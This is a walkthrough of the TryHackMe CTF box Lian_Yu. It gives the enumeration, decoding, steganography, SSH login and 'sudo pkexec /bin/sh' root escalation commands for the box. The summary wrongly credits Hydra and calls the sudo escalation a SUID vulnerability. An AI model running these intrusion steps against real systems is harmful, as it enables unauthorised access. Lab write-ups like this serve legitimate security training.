Challenges: Lian_Yu (TryHackMe)

Welcome to Lian_YU, a beginner-friendly CTF box with an Arrowverse theme. While the storyline and references might feel familiar to fans of the Arrow series, prior knowledge isn't required to complete the challenge. The goal is simple: enumerate thoroughly, discover hidden paths, and uncover the user and root flags.

This box walks you through essential pentesting skills — from web directory brute-forcing, decoding credentials, FTP file analysis, steganography, and privilege escalation using common misconfigurations. Each step simulates a real-world attack vector and is perfect for learners building foundational red teaming skills.

Find the Flags

Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun.

Answer the questions below

1. Deploy the VM and Start the Enumeration.

   starting off with an enumeration using nmap and gobuster:

   nmap -sV IP_Address

   

   gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt

   

   From the site but not much helpful:

   Note: Hi Everyone, I am a huge fan to Arrowverse, I built this vm concept based on Arrow (first season) you will find a few things similar here and I posted this Content here just to entertain you, To complete this CTF it isn't mandatory to have knowledge on Arrrowverse series. I hope you will Enjoy the content and have fun :).

   figured out that we need to try using a different wordlists on gobuster which revealed a path called /island

gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/big.txt

on the path a name, vigilante was revealed which will be important when we’ll be looking for our flag

trying another wordlist to try find the other folder:

2. What is the Web Directory you found?

   gobuster dir -u http://IP_Address/island -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

   

   checking the path with this folder name on the site there’s an hint revealed:

   

3. what is the file name you found?

   we’ll use -x flag on gobuster to find the file

   gobuster dir -u http://IP_Address/island/2100 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x .ticket

   

   checking the site with the path of the file we find an hash which will FTP Password

4. what is the FTP Password?

   

   using Base58 to decode on Cyberchef

   

   with the password and the user vigilante from earlier we’ll login into FTP and try get some files which are there

   

   

   there’s one file called .other_user which reveals a user called slade, this will be relevant

   
    Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of warfare. She immediately fell in love with him and realized that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to privately train Slade in guerrilla warfare. In less than a year, Slade mastered every fighting form presented to him and was soon promoted to the rank of lieutenant colonel. Six months later, Adeline and he were married and she became pregnant with their first child. The war in Vietnam began to escalate and Slade was shipped overseas. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Wintergreen, to whom he would later return the favor.
   
    Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge.[7] However, Slade kept this career secret from his family, even though his wife was an expert military combat instructor.
   
    A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was against his personal honor code. He attacked and killed the kidnappers at the rendezvous. Unfortunately, Joseph's throat was slashed by one of the criminals before Slade could prevent it, destroying Joseph's vocal cords and rendering him mute.
   
    After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, his confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless half covering his lost right eye. Without his mask, Slade wears an eyepatch to cover his eye.
   

Tried using tools like strings, steghide, binwalk, etc to try find some hints from the images but it didn’t help at first. The Leave_me_alone.png file needed to fixed. Using hexedit we’ll edit the header:

hexedit Leave_me_alone.png

cp Leave_me_alone.png fixed.png

we change the header to the correct PNG file signature which must start with the 8 bytes i.e:

58 45 6F AE 0A 0D 1A 0A → 89 50 4E 47 0D 0A 1A 0A

hexedit fixed.png

open the fixed.png file on your folders to see what it reveals:

now we can move ahead and use steghide to extract files within the aa.jpg file

steghide --extract -sf aa.jpg

ls

unzip ss.zip

5. what is the file name with SSH password?

cat passwd.txt

cat shado

6. user.txt

   we’ll use SSH with the revealed password and the slade username inorder to get our low initial access with user flag

find / -type f -name user.txt 2>/dev/null

7. root.txt

   this user and had permission to run: sudo -l this helped us know to escalate privileges to the root user:

   sudo -l

   sudo pkexec /bin/sh

   find / -type f -name root.txt 2>/dev/null

   

The Lian_YU box was a rewarding challenge that covered multiple techniques across the kill chain. It emphasized the importance of enumeration, creative wordlist usage, basic steganography (e.g., header repair), and privilege escalation using pkexec — a known SUID binary vulnerability.

Throughout the journey, we leveraged tools like Gobuster, Steghide, Hydra, and Hexedit, and practiced reading clues from both the application and underlying system. By combining careful analysis with patience and practical tooling, we successfully captured the user and root flags.

This CTF serves as an excellent training ground for anyone aiming to build real-world penetration testing skills. Whether you're prepping for a certification or sharpening your enumeration game, Lian_YU is a solid step forward.